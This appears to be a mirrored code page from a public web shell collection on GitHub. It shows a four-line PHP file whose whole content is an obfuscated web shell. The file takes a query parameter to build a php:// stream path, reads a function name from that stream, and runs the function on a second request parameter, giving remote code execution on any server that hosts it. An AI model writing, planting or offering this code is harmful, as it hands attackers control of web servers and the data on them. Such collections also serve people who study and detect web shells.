mirror of
https://github.com/tennc/webshell
synced 2024-11-22 03:03:03 +00:00
4 lines
58 B
PHP
4 lines
58 B
PHP
|
<?php
|
||
|
$q=$_GET[1];
|
||
|
file_get_contents("php".$q)($_GET[2]);
|